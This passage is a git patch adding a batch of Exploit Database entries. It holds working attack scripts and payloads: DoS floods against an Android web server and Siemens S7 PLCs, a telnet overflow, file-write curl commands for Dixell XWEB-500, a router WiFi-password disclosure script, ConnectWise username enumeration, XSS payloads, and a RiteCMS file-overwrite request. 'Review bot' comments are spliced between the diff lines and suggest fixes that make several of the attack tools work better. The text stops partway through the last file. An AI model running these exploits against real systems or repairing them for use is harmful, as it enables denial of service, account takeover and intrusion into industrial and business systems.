From 1472d8e7230de02ec01732cd1a160c7cef6767da Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Thu, 6 Jan 2022 05:01:54 +0000 Subject: [PATCH] DB: 2022-01-06 32 changes to exploits/shellcodes Siemens S7 Layer 2 - Denial of Service (DoS) TRIGONE Remote System Monitor 3.61 - Unquoted Service Path Automox Agent 32 - Local Privilege Escalation ConnectWise Control 19.2.24707 - Username Enumeration Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS) AWebServer GhostBuilding 18 - Denial of Service (DoS) TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated) Dixell XWEB 500 - Arbitrary File Write Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated) CMSimple 5.4 - Cross Site Scripting (XSS) RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated) RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated) RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated) WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated) WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated) Movie Rating System 1.0 - SQLi to RCE (Unauthenticated) Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated) Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS) SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS) Nettmp NNT 5.1 - SQLi Authentication Bypass Hostel Management System 2.1 - Cross Site Scripting (XSS) Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated) BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated) Hospitals Patient Records Management System 1.0 - Account TakeOver Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated) Vodafone H-500-s 3.5.10 - WiFi Password Disclosure openSIS Student Information System 8.0 - 'multiple' SQL 
Injection Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS) WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated) --- exploits/android/remote/50629.py | 85 +++++++++++++ exploits/hardware/dos/50613.py | 105 ++++++++++++++++ exploits/hardware/remote/50620.py | 41 +++++++ exploits/hardware/remote/50639.txt | 29 +++++ exploits/hardware/webapps/50636.py | 27 +++++ exploits/multiple/remote/50618.py | 178 ++++++++++++++++++++++++++++ exploits/multiple/webapps/50632.txt | 40 +++++++ exploits/php/webapps/50612.txt | 30 +++++ exploits/php/webapps/50614.txt | 110 +++++++++++++++++ exploits/php/webapps/50615.txt | 53 +++++++++ exploits/php/webapps/50616.txt | 143 ++++++++++++++++++++++ exploits/php/webapps/50617.txt | 84 +++++++++++++ exploits/php/webapps/50619.py | 86 ++++++++++++++ exploits/php/webapps/50621.py | 56 +++++++++ exploits/php/webapps/50622.py | 71 +++++++++++ exploits/php/webapps/50623.py | 88 ++++++++++++++ exploits/php/webapps/50624.py | 39 ++++++ exploits/php/webapps/50625.txt | 20 ++++ exploits/php/webapps/50626.txt | 19 +++ exploits/php/webapps/50627.txt | 31 +++++ exploits/php/webapps/50628.txt | 15 +++ exploits/php/webapps/50630.txt | 22 ++++ exploits/php/webapps/50631.txt | 122 +++++++++++++++++++ exploits/php/webapps/50634.txt | 35 ++++++ exploits/php/webapps/50635.py | 113 ++++++++++++++++++ exploits/php/webapps/50637.txt | 60 ++++++++++ exploits/php/webapps/50641.txt | 22 ++++ exploits/php/webapps/50643.txt | 16 +++ exploits/python/remote/50640.py | 130 ++++++++++++++++++++ exploits/windows/local/50633.txt | 32 +++++ exploits/windows/local/50642.ps1 | 42 +++++++ exploits/windows/remote/50638.txt | 12 ++ files_exploits.csv | 32 +++++ 33 files changed, 1988 insertions(+) create mode 100755 exploits/android/remote/50629.py create mode 100755 exploits/hardware/dos/50613.py create mode 100755 exploits/hardware/remote/50620.py create mode 100644 exploits/hardware/remote/50639.txt create mode 100755 
exploits/hardware/webapps/50636.py create mode 100755 exploits/multiple/remote/50618.py create mode 100644 exploits/multiple/webapps/50632.txt create mode 100644 exploits/php/webapps/50612.txt create mode 100644 exploits/php/webapps/50614.txt create mode 100644 exploits/php/webapps/50615.txt create mode 100644 exploits/php/webapps/50616.txt create mode 100644 exploits/php/webapps/50617.txt create mode 100755 exploits/php/webapps/50619.py create mode 100755 exploits/php/webapps/50621.py create mode 100755 exploits/php/webapps/50622.py create mode 100755 exploits/php/webapps/50623.py create mode 100755 exploits/php/webapps/50624.py create mode 100644 exploits/php/webapps/50625.txt create mode 100644 exploits/php/webapps/50626.txt create mode 100644 exploits/php/webapps/50627.txt create mode 100644 exploits/php/webapps/50628.txt create mode 100644 exploits/php/webapps/50630.txt create mode 100644 exploits/php/webapps/50631.txt create mode 100644 exploits/php/webapps/50634.txt create mode 100755 exploits/php/webapps/50635.py create mode 100644 exploits/php/webapps/50637.txt create mode 100644 exploits/php/webapps/50641.txt create mode 100644 exploits/php/webapps/50643.txt create mode 100755 exploits/python/remote/50640.py create mode 100644 exploits/windows/local/50633.txt create mode 100644 exploits/windows/local/50642.ps1 create mode 100644 exploits/windows/remote/50638.txt diff --git a/exploits/android/remote/50629.py b/exploits/android/remote/50629.py new file mode 100755 index 000000000..df9b2d4e3 --- /dev/null +++ b/exploits/android/remote/50629.py 
@@ -0,0 +1,85 @@ +# Exploit Title: AWebServer GhostBuilding 18 - Denial of Service (DoS) +# Date: 28/12/2021 +# Exploit Author: Andres Ramos [Invertebrado] +# Vendor Homepage: http://sylkat-tools.rf.gd/awebserver.htm +# Software Link: https://play.google.com/store/apps/details?id=com.sylkat.apache&hl=en +# Version: AWebServer GhostBuilding 18 +# Tested on: Android + +#!/usr/bin/python3 + +# ********************************************************************************* +# * Author: Andres Ramos [Invertebrado] * +# * AWebServer GhostBuilding 18 - Remote Denial of Service (DoS) & System Crash * +# ********************************************************************************* + +import signal +import requests +from pwn import * + +#Colors +class colors(): + GREEN = "\033[0;32m\033[1m" + END = "\033[0m" + RED = "\033[0;31m\033[1m" + BLUE = "\033[0;34m\033[1m" + YELLOW = "\033[0;33m\033[1m" + PURPLE = "\033[0;35m\033[1m" + TURQUOISE = "\033[0;36m\033[1m" + GRAY = "\033[0;37m\033[1m" + +exit = False + +def def_handler(sig, frame): + print(colors.RED + "\n[!] Exiting..." + colors.END) + exit = True + sys.exit(0) + + if threading.activeCount() > 1: + os.system("tput cnorm") + os._exit(getattr(os, "_exitcode", 0)) + else: + os.system("tput cnorm") + sys.exit(getattr(os, "_exitcode", 0)) + +signal.signal(signal.SIGINT, def_handler) + +if len(sys.argv) < 3: + print(colors.RED + "\n[!] 
Usage: " + colors.YELLOW + "{} ".format(sys.argv[0]) + colors.RED + "<" + colors.BLUE + "URL" + colors.RED + "> <" + colors.BLUE + "THREADS" + colors.RED +">" + colors.END) + sys.exit(1) + +url = sys.argv[1] +Tr = sys.argv[2] + +def http(): + counter = 0 + p1 = log.progress(colors.TURQUOISE + "Requests" + colors.END) + while True: + r = requests.get(url) + r = requests.get(url + "/mysqladmin") + counter += 2 + p1.status(colors.YELLOW + "({}) ({}/mysqladmin)".format(url, url) + colors.GRAY + " = " + colors.GREEN + "[{}]".format(counter) + colors.END) + + if exit: + break + +if __name__ == '__main__': + + threads = [] + + try: + for i in range(0, int(Tr)): + t = threading.Thread(target=http) + threads.append(t) + + sys.stderr = open("/dev/null", "w") + + for x in threads: + x.start() + + for x in threads: + x.join() + + except Exception as e: + log.failure(str(e)) + sys.exit(1) \ No newline at end of file diff --git a/exploits/hardware/dos/50613.py b/exploits/hardware/dos/50613.py new file mode 100755 index 000000000..f6769e750 --- /dev/null +++ b/exploits/hardware/dos/50613.py 
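Review bot: `exit = True` in def_handler rebinds a function local, not the module-level `exit` that http() tests, and it sits after `sys.exit(0)`, so neither it nor the threading/os cleanup below it is ever reached; the `if exit: break` in http() can therefore never fire. The flag also shadows the `exit` builtin, and `sys`, `threading` and `os` are only in scope through `from pwn import *`. If the flag is meant to stop the workers, declare `global exit` (better: rename it) at the top of the handler and drop the early `sys.exit(0)`; SystemExit raised from a signal handler unwinds only the main thread in any case. The usage-check statement continues on the following physical line.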
@@ -0,0 +1,105 @@ +# Exploit Title: Siemens S7 Layer 2 - Denial of Service (DoS) +# Date: 21/10/2021 +# Exploit Author: RoseSecurity +# Vendor Homepage: https://www.siemens.com/us/en.html +# Version: Firmware versions >= 3 +# Tested on: Siemens S7-300, S7-400 PLCs + + +#!/usr/bin/python3 + +from scapy.all import * +from colorama import Fore, Back, Style +from subprocess import Popen, PIPE +from art import * +import threading +import subprocess +import time +import os +import sys +import re + +# Banner + +print(Fore.RED + r""" + + ▄▄▄· ▄• ▄▌▄▄▄▄▄ • ▌ ▄ ·. ▄▄▄· ▄▄▄▄▄ ▄▄▄ +▐█ ▀█ █▪██▌•██ ▪ ·██ ▐███▪▐█ ▀█ •██ ▪ ▀▄ █· +▄█▀▀█ █▌▐█▌ ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ +▐█ ▪▐▌▐█▄█▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌ + ▀ ▀ ▀▀▀ ▀▀▀ ▀█▄▀▪▀▀ █▪▀▀▀ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀ +▄▄▄▄▄▄▄▄ .▄▄▄ • ▌ ▄ ·. ▪ ▐ ▄ ▄▄▄· ▄▄▄▄▄ ▄▄▄ +•██ ▀▄.▀·▀▄ █··██ ▐███▪██ •█▌▐█▐█ ▀█ •██ ▪ ▀▄ █· + ▐█.▪▐▀▀▪▄▐▀▀▄ ▐█ ▌▐▌▐█·▐█·▐█▐▐▌▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ + ▐█▌·▐█▄▄▌▐█•█▌██ ██▌▐█▌▐█▌██▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌ + ▀▀▀ ▀▀▀ .▀ ▀▀▀ █▪▀▀▀▀▀▀▀▀ █▪ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀ + """) + +time.sleep(1.5) + +# Get IP to exploit + +IP = input("Enter the IP address of the device to exploit: ") + +# Find the mac address of the device + +Mac = getmacbyip(IP) + +# Function to send the ouput to "nothing" + +def NULL (): + + f = open(os.devnull, 'w') + sys.stdout = f + +# Eternal loop to produce DoS condition + +def Arnold (): + + AutomatorTerminator = True + + while AutomatorTerminator == True: + Packet = Ether() + Packet.dst = "00:00:00:00:00:00" + Packet.src = Mac + sendp(Packet) + NULL() +def Sarah (): + + AutomatorTerminator = True + + while AutomatorTerminator == True: + Packet = Ether() + Packet.dst = "00:00:00:00:00:00" + Packet.src = Mac + sendp(Packet) + NULL() +def Kyle (): + AutomatorTerminator = True + + while AutomatorTerminator == True: + Packet = Ether() + Packet.dst = "00:00:00:00:00:00" + Packet.src = Mac + sendp(Packet) + NULL() + +# Arnold +ArnoldThread = threading.Thread(target=Arnold) +ArnoldThread.start() 
+ArnoldThread.join() +NULL() + +# Sarah + +SarahThread = threading.Thread(target=Sarah) +SarahThread.start() +SarahThread.join() +NULL() + +# Kyle + +KyleThread = threading.Thread(target=Kyle) +KyleThread.start() +KyleThread.join() +NULL() \ No newline at end of file diff --git a/exploits/hardware/remote/50620.py b/exploits/hardware/remote/50620.py new file mode 100755 index 000000000..670952f72 --- /dev/null +++ b/exploits/hardware/remote/50620.py @@ -0,0 +1,41 @@ +# Exploit Title: Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS) +# Discovered by: Yehia Elghaly +# Discovered Date: 22/12/2021 +# Vendor Homepage: https://www.accu-time.com/ +# Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/ +# Tested Version: 1.0 +# Vulnerability Type: Buffer Overflow (DoS) Remote +# Tested on OS: linux + +# Description: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow + +# Steps to reproduce: +# 1. - Accu-Time Systems MAXIMUS 1.0 Telnet listening on port 23 +# 2. - Run the Script from remote PC/IP +# 3. - Telnet Crashed + +#!/usr/bin/env python3 + +import socket +import sys +print("#######################################################") +print("# Accu-Time Systems MAXIMUS Remote (BUffer Overflow) #") +print("# -------------------------- #") +print("# BY Yehia Elghaly #") +print("#######################################################") + +if (len(sys.argv)<2): + print ("Usage: %s ") % sys.argv[0] + print ("Example: %s 192.168.113.1 ") % sys.argv[0] + exit(0) + +print ("\nSending Evil.......Buffer...") +s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + +try: + s.connect((sys.argv[1], 23)) + buffer = "A"*9400 + s.send(" Crashed Check the connection") + Print ("Crashed") +except: + print ("Could not connect to ACCU Time Telnet!") \ No newline at end of file diff --git a/exploits/hardware/remote/50639.txt b/exploits/hardware/remote/50639.txt new file mode 100644 index 000000000..44d200931 --- /dev/null 
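Review bot: Arnold, Sarah and Kyle are byte-identical definitions, and `AutomatorTerminator` is assigned once and never changed, so this is one function with a `while True:` loop copied three times; one definition started three times would read the same. NULL() rebinds sys.stdout to a freshly opened os.devnull on every loop iteration without closing the previous object, and from the first call on it also silences the script's own output. Popen/PIPE, subprocess, re and the `art` wildcard import are unused. A comment on `Mac = getmacbyip(IP)` noting that this is the only use of the entered IP and that the send loop is unconditional would help a reader.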
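Review bot: In the usage branch, `print ("Usage: %s ") % sys.argv[0]` applies `%` to print()'s return value (None), which raises TypeError under the Python 3 shebang the file declares; the Example line has the same shape. Later `Print ("Crashed")` is an undefined name, and the bare `except:` around the connect block reports that NameError and any socket error alike as "Could not connect to ACCU Time Telnet!". Move the operand inside the call, `print("Usage: %s " % sys.argv[0])`, fix the capitalisation, and catch `OSError` rather than everything so genuine script errors surface.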
+++ b/exploits/hardware/remote/50639.txt @@ -0,0 +1,29 @@ +# Exploit Title: Dixell XWEB-500 - Arbitrary File Write +# Google Dork: inurl:"xweb500.cgi" +# Date: 03/01/2022 +# Exploit Author: Roberto Palamaro +# Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it +# Version: XWEB-500 +# Tested on: Dixell XWEB-500 +# References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/ + +# Emerson Dixell XWEB-500 is affected by multiple Arbitrary File Write Vulnerability + +# Endpoint: logo_extra_upload.cgi +# Here the first line of the POC is the filename and the second one is the content of the file be written +# Write file +echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' +# Verify +curl -A Chrome -is "http://[target]:[port]/logo/" + +# Endpoint: lo_utils.cgi +# Here ACTION=5 is to enable write mode +echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' +# Verify using ACTION=3 to listing resources +echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' + +# Endpoint: cal_save.cgi +# Here the first line of the POC is the filename and the second one is the content of the file be written +echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' +# Verify +curl -A Chrome -kis http://[target]:[port]/cgi-bin/cal_dir.cgi \ No newline at end of file diff --git a/exploits/hardware/webapps/50636.py b/exploits/hardware/webapps/50636.py new file mode 100755 index 000000000..24ac46e67 --- /dev/null 
+++ b/exploits/hardware/webapps/50636.py @@ -0,0 +1,27 @@ +# Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure +# Date: 01/01/2022 +# Exploit Author: Daniel Monzón (stark0de) +# Vendor Homepage: https://www.vodafone.es/ +# Software Link: N/A +# Version: Firmware version Vodafone-H-500-s-v3.5.10 +# Hardware model: Sercomm VFH500 + +# The WiFi access point password gets disclosed just by performing a GET request with certain headers + +import requests +import sys +import json +if len(sys.argv) != 2: +print("Usage: python3 vodafone-pass-disclose.py http://IP") +sys.exit() +url = sys.argv[1]+"/data/activation.json" +cookies = {"pageid": "129"} +headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 + +Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept- +Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested- +With": "XMLHttpRequest", "Connection": "close", "Referer":"http://192.168.0.1/activation.html?mode=basic&lang=en-es&step=129"} + +req=requests.get(url, headers=headers, cookies=cookies) +result=json.loads(req.text)[3].get("wifi_password") +print("[+] The wifi password is: "+result) \ No newline at end of file diff --git a/exploits/multiple/remote/50618.py b/exploits/multiple/remote/50618.py new file mode 100755 index 000000000..9b3ab9c15 --- /dev/null +++ b/exploits/multiple/remote/50618.py 
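Review bot: The two statements under `if len(sys.argv) != 2:` are at column 0, so the file as committed fails with IndentationError before anything runs, and `sys.exit()` on a usage error exits with status 0; indent both lines and use `sys.exit(1)`. The `headers` literal also contains hard line breaks inside the User-Agent, Accept-Language and X-Requested-With strings, which looks like a paste artefact rather than intended code. `json.loads(req.text)[3].get("wifi_password")` assumes a JSON list with at least four objects and never checks `req.status_code`, so an error page produces an IndexError or JSONDecodeError instead of a message.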
@@ -0,0 +1,178 @@ +# Exploit Title: ConnectWise Control 19.2.24707 - Username Enumeration +# Date: 17/12/2021 +# Exploit Author: Luca Cuzzolin aka czz78 +# Vendor Homepage: https://www.connectwise.com/ +# Version: vulnerable <= 19.2.24707 +# CVE : CVE-2019-16516 + +# https://github.com/czz/ScreenConnect-UserEnum + +from multiprocessing import Process, Queue +from statistics import mean +from urllib3 import exceptions as urlexcept +import argparse +import math +import re +import requests + +class bcolors: + HEADER = '\033[95m' + OKBLUE = '\033[94m' + OKCYAN = '\033[96m' + OKGREEN = '\033[92m' + WARNING = '\033[93m' + FAIL = '\033[91m' + ENDC = '\033[0m' + BOLD = '\033[1m' + UNDERLINE = '\033[4m' + + +headers = [] + +def header_function(header_line): + headers.append(header_line) + + +def process_enum(queue, found_queue, wordlist, url, payload, failstr, verbose, proc_id, stop, proxy): + try: + # Payload to dictionary + payload_dict = {} + for load in payload: + split_load = load.split(":") + if split_load[1] != '{USER}': + payload_dict[split_load[0]] = split_load[1] + else: + payload_dict[split_load[0]] = '{USER}' + + # Enumeration + total = len(wordlist) + for counter, user in enumerate(wordlist): + user_payload = dict(payload_dict) + for key, value in user_payload.items(): + if value == '{USER}': + user_payload[key] = user + + dataraw = "".join(['%s=%s&' % (key, value) for (key, value) in user_payload.items()])[:-1] + headers={"Accept": "*/*" , "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"} + + req = requests.request('POST',url,headers=headers,data=dataraw, proxies=proxies) + + x = "".join('{}: {}'.format(k, v) for k, v in req.headers.items()) + + if re.search(r"{}".format(failstr), str(x).replace('\n','').replace('\r','')): + queue.put((proc_id, "FOUND", user)) + found_queue.put((proc_id, "FOUND", user)) + if stop: break + elif 
verbose: + queue.put((proc_id, "TRIED", user)) + queue.put(("PERCENT", proc_id, (counter/total)*100)) + + except (urlexcept.NewConnectionError, requests.exceptions.ConnectionError): + print("[ATTENTION] Connection error on process {}! Try lowering the amount of threads with the -c parameter.".format(proc_id)) + + +if __name__ == "__main__": + # Arguments + parser = argparse.ArgumentParser(description="http://example.com/Login user enumeration tool") + parser.add_argument("url", help="http://example.com/Login") + parser.add_argument("wordlist", help="username wordlist") + parser.add_argument("-c", metavar="cnt", type=int, default=10, help="process (thread) count, default 10, too many processes may cause connection problems") + parser.add_argument("-v", action="store_true", help="verbose mode") + parser.add_argument("-s", action="store_true", help="stop on first user found") + parser.add_argument("-p", metavar="proxy", type=str, help="socks4/5 http/https proxy, ex: socks5://127.0.0.1:9050") + args = parser.parse_args() + + # Arguments to simple variables + wordlist = args.wordlist + url = args.url + payload = ['ctl00%24Main%24userNameBox:{USER}', 'ctl00%24Main%24passwordBox:a', 'ctl00%24Main%24ctl05:Login', '__EVENTTARGET:', '__EVENTARGUMENT:', '__VIEWSTATE:'] + verbose = args.v + thread_count = args.c + failstr = "PasswordInvalid" + stop = args.s + proxy= args.p + + print(bcolors.HEADER + """ + __ ___ __ ___ +| | |__ |__ |__) |__ |\ | | | |\/| +|__| ___| |___ | \ |___ | \| |__| | | + +ScreenConnect POC by czz78 :) + + """+ bcolors.ENDC); + print("URL: "+url) + print("Payload: "+str(payload)) + print("Fail string: "+failstr) + print("Wordlist: "+wordlist) + if verbose: print("Verbose mode") + if stop: print("Will stop on first user found") + + proxies = {'http': '', 'https': ''} + if proxy: + proxies = {'http': proxy, 'https': proxy} + + print("Initializing processes...") + # Distribute wordlist to processes + wlfile = open(wordlist, "r", encoding="ISO-8859-1") # or 
utf-8 + tothread = 0 + wllist = [[] for i in range(thread_count)] + for user in wlfile: + wllist[tothread-1].append(user.strip()) + if (tothread < thread_count-1): + tothread+=1 + else: + tothread = 0 + + # Start processes + tries_q = Queue() + found_q = Queue() + processes = [] + percentage = [] + last_percentage = 0 + for i in range(thread_count): + p = Process(target=process_enum, args=(tries_q, found_q, wllist[i], url, payload, failstr, verbose, i, stop, proxy)) + processes.append(p) + percentage.append(0) + p.start() + + print(bcolors.OKBLUE + "Processes started successfully! Enumerating." + bcolors.ENDC) + # Main process loop + initial_count = len(processes) + while True: + # Read the process output queue + try: + oldest = tries_q.get(False) + if oldest[0] == 'PERCENT': + percentage[oldest[1]] = oldest[2] + elif oldest[1] == 'FOUND': + print(bcolors.OKGREEN + "[{}] FOUND: {}".format(oldest[0], oldest[2]) + bcolors.ENDC) + elif verbose: + print(bcolors.OKCYAN + "[{}] Tried: {}".format(oldest[0], oldest[2]) + bcolors.ENDC) + except: pass + + # Calculate completion percentage and print if /10 + total_percentage = math.ceil(mean(percentage)) + if total_percentage % 10 == 0 and total_percentage != last_percentage: + print("{}% complete".format(total_percentage)) + last_percentage = total_percentage + + # Pop dead processes + for k, p in enumerate(processes): + if p.is_alive() == False: + processes.pop(k) + + # Terminate all processes if -s flag is present + if len(processes) < initial_count and stop: + for p in processes: + p.terminate() + + # Print results and terminate self if finished + if len(processes) == 0: + print(bcolors.OKBLUE + "EnumUser finished, and these usernames were found:" + bcolors.ENDC) + while True: + try: + entry = found_q.get(False) + print(bcolors.OKGREEN + "[{}] FOUND: {}".format(entry[0], entry[2]) + bcolors.ENDC) + except: + break + quit() \ No newline at end of file 
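Review bot: process_enum() reads `proxies` in the requests.request call, but that name is only bound at module level inside the `if __name__ == "__main__":` block, while the `proxy` parameter the function actually receives is never used; this works under the fork start method and fails with NameError under spawn (Windows, macOS default). Build the mapping from the parameter at the top of the function: `proxies = {'http': proxy, 'https': proxy} if proxy else {'http': '', 'https': ''}`. The `headers` local also shadows the module-level `headers` list that header_function appends to, and the main loop's `except: pass` swallows KeyboardInterrupt along with the intended queue.Empty (multiprocessing.Queue.get(False) raises `queue.Empty`, so `from queue import Empty` is needed). `wlfile` is opened and never closed; a `with` block around the distribution loop would cover it.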
diff --git a/exploits/multiple/webapps/50632.txt b/exploits/multiple/webapps/50632.txt new file mode 100644 index 000000000..75424e8c4 --- /dev/null +++ b/exploits/multiple/webapps/50632.txt @@ -0,0 +1,40 @@ +# Exploit Title: BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated) +# Google Dork: intext:"BeyondTrust" "Redistribution Prohibited" +# Date: 30/12/2021 +# Exploit Author: Malcrove +# Vendor Homepage: https://www.beyondtrust.com/ +# Version: v6.0 and earlier versions + +Summary: + +Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint. + + +Vulnerability Details: + +Affected Endpoint: /appliance/login +Affected Parameter: login[password] +Request Method: GET or POST + + +Proof of concept (POC): + +By navigating to the below link from a modern web browser, alert(document.domain) Javascript method would be fired in the same context of Beyondtrust Remote Support domain. + +http:///appliance/login?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password + + +Mitigation: + +A fix has been released by the vendor in NSBase 6.1. It's recommended to update the vulnerable appliance base version to the latest version. + +- Time-Line: + + April 6, 2021: Vulnerability advisory sent to the vendor (Beyondtrust) + April 8, 2021: Recevied an initial reply from the vendor + Jun 10, 2021: The vendor released a fix for the vulnerability in NSbase 6.1 + Dec 30, 2021: The Responsible public disclosure + + +- Credits +Ahmed Aboul-Ela (Malcrove) \ No newline at end of file 
diff --git a/exploits/php/webapps/50612.txt b/exploits/php/webapps/50612.txt new file mode 100644 index 000000000..b1d1c74ac --- /dev/null +++ b/exploits/php/webapps/50612.txt @@ -0,0 +1,30 @@ +# Exploit Title: CMSimple 5.4 - Cross Site Scripting (XSS) +# Date: 22/10/2021 +# Exploit Author: heinjame +# Vendor Homepage: https://www.cmsimple.org/en/ +# Software Link: https://www.cmsimple.org/en/?Downloads +# Version: <=5.4 +# Tested on: Linux os + +[Description] + +Since the application is filtering user input with preg_replace, attackers can able to bypass restriction by using HTML to Unicode encoding. + +So the application let's attacker perform DOM based XSS. + +[Payload and POC] + +File > images > Upload a file + +Attack vector >> ')-alert(1)// (need to encode)>> +')-alert(1)// + +When the victim clicks the delete button,an alert will be executed. + +Script to encode the payload + +payload = input() +finalpayload = "" +for i in payload: + finalpayload = finalpayload + "&#" + str(ord(i)) + ";" +print(finalpayload) \ No newline at end of file diff --git a/exploits/php/webapps/50614.txt b/exploits/php/webapps/50614.txt new file mode 100644 index 000000000..4c2abb83a --- /dev/null +++ b/exploits/php/webapps/50614.txt 
@@ -0,0 +1,110 @@ +# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated) +# Date: 25/07/2021 +# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) +# Vendor Homepage: https://ritecms.com/ +# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip +# Version: <= 3.1.0 +# Google Dork: intext:"Powered by RiteCMS" +# Tested on: Windows 10, Ubuntu 18, XAMPP +# Reference: https://gist.github.com/faisalfs10x/4a3b76f666ff4c0443e104c3baefb91b + + +################ +# Description # +################ + +# RiteCMS version 3.1.0 and below suffers from an arbitrary file overwrite vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to overwrite any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to write). Furthermore, an attacker might leverage the capability of arbitrary file overwrite to modify existing file such as /etc/passwd or /etc/shadow if the current PHP process user is run as root. + + +############################################################ +# PoC to overwrite existing index.php to display phpinfo() # +############################################################ + + +Steps to Reproduce: + +1. Login as admin +2. Go to File Manager +3. Then, click Upload file > Browse.. +4. Upload any file and click checkbox name "overwrite file with same name" +4. Intercept the request and replace current file name to any files path on the server via parameter "file_name". 
+ + +PoC: param file_name - to overwrite index.php to display phpinfo, so the payload will be "../index.php" + param filename - with the content of "" + +Request: +======== + +POST /ritecmsv3.1.0/admin.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------351719865731412638493510448298 +Content-Length: 1840 +Origin: http://localhost +DNT: 1 +Connection: close +Referer: http://192.168.8.143/ritecmsv3.1.0/admin.php?mode=filemanager&action=upload&directory=media +Cookie: PHPSESSID=nuevl0lgkrc3dv44g3vgkoqqre +Upgrade-Insecure-Requests: 1 +Sec-GPC: 1 + +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="mode" + +filemanager +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="file"; filename="anyfile.txt" +Content-Type: application/octet-stream + +content of the file to overwrite here +-- this is example to overwrite index.php to display phpinfo -- + +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="directory" + +media +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="file_name" + +../index.php +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="overwrite_file" + +true +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="upload_mode" + +1 +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="resize_xy" + +x +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="resize" + +640 
